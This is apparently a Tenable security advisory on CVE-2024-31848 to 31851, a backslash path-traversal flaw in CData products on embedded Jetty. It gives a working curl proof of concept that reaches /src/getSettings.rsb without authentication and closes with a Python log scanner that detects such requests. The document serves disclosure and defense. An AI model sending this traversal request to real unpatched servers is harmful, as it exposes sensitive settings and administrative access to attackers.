A researcher at Tenable discovered a path traversal vulnerability affecting the Java versions of multiple CData products when deployed using the embedded Jetty server, with varying impacts per product. The issue exists because of a combination of how the embedded Jetty server and CData servlets handle requests.
Technical Details
The path traversal can be leveraged as a result of the following conditions:
- The servlet mappings and security constraints laid out in each application's web.xml configuration file appear to be processed by Jetty in ways unintended by CData, allowing an attacker to bypass intended security constraint restrictions.
- Additionally, Jetty does not reject backslash (\) characters in URIs as other servers do: the same requests sent to the CData applications deployed on Tomcat are rejected, because Tomcat does not allow \ characters in the URI. The CData servlets, however, still process such URIs as valid paths.
- The CData applications lacked explicit session checks on a number of endpoints, allowing an attacker to leverage the path traversal to perform sensitive actions that would otherwise be restricted to an authenticated user.
CVE-2024-31848 - Path Traversal in CData API Server
Base Score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
CVE-2024-31849 - Path Traversal in CData Connect
Base Score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
CVE-2024-31850 - Path Traversal in CData Arc
Base Score: 8.6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
CVE-2024-31851 - Path Traversal in CData Sync
Base Score: 8.6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
Proof of Concept:
The simplest proof of concept, which works for each product, is accessing /src/getSettings.rsb, which, depending on the application, can reveal sensitive data.
Regular request:
curl --head -H 'Host: 127.0.0.1:8080' -H 'Referer: http://127.0.0.1:8080/' 'http://127.0.0.1:8080/src/getSettings.rsb?@json'
HTTP/1.1 303 See Other
Date: Fri, 05 Apr 2024 17:09:21 GMT
Set-Cookie: apiserver_jsessionid=node01wx9hehp2d2kh3wlpx7p9au292.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://127.0.0.1:8080/login.rst
Content-Length: 0
Server: Jetty(10.0.15)
With Path Traversal:
curl --head -H 'Host: 127.0.0.1:8080' -H 'Referer: http://127.0.0.1:8080/' 'http://127.0.0.1:8080/ui/..\src\getSettings.rsb?@json'
HTTP/1.1 200 OK
Date: Fri, 05 Apr 2024 17:11:20 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=utf-8
Content-Disposition: attachment; filename=GetSettings.json
Transfer-Encoding: chunked
Server: Jetty(10.0.15)
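As an added example (not part of the Tenable advisory or of CData's or Jetty's code), the following Python scanner applies to Jetty-style access-log lines the same normalisation the advisory describes (treating \ as a separator, resolving ..) and flags requests whose canonical path escapes the prefix the raw request appeared to target; the log lines are constructed, and the log format is assumed to be the NCSA style Jetty's request log writes.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory); the two traversal
# forms mirror the ..\src\getSettings.rsb request shown in the proof of concept.
SAMPLE_LOG = """\
127.0.0.1 - - [05/Apr/2024:17:09:21 +0000] "HEAD /src/getSettings.rsb?@json HTTP/1.1" 303 0
127.0.0.1 - - [05/Apr/2024:17:11:20 +0000] "HEAD /ui/..\\src\\getSettings.rsb?@json HTTP/1.1" 200 512
127.0.0.1 - - [05/Apr/2024:17:12:02 +0000] "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1" 200 512
127.0.0.1 - - [05/Apr/2024:17:13:40 +0000] "GET /ui/index.html HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def canonicalize(raw_path: str) -> str:
    """Return the path the servlet effectively handles: percent-decode, treat
    '\\' as a segment separator (Jetty passes it through), resolve '.' and '..'."""
    decoded = unquote(raw_path).replace("\\", "/")
    return posixpath.normpath(decoded) if decoded else "/"


def is_traversal(raw_path: str) -> bool:
    """True when the decoded path contains a backslash, or when resolving
    dot-segments changes it, i.e. the prefix a security constraint matched on
    is not the prefix the servlet ends up serving."""
    decoded = unquote(raw_path)
    if "\\" in decoded:
        return True
    return canonicalize(raw_path) != (decoded.rstrip("/") or "/")


def scan_log(log_text: str) -> list[dict]:
    """Parse each access-log line and return the requests flagged as traversal,
    including the canonical path so an analyst sees which endpoint was reached."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]  # drop the query string
        if is_traversal(path):
            hits.append({"method": m.group("method"), "raw": path,
                         "canonical": canonicalize(path), "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['method']} {hit['raw']} -> {hit['canonical']} ({hit['status']})")
```

Both backslash requests resolve to /src/getSettings.rsb and are reported with their 200 status, while the direct (redirected) request and the ordinary /ui/ page are not flagged.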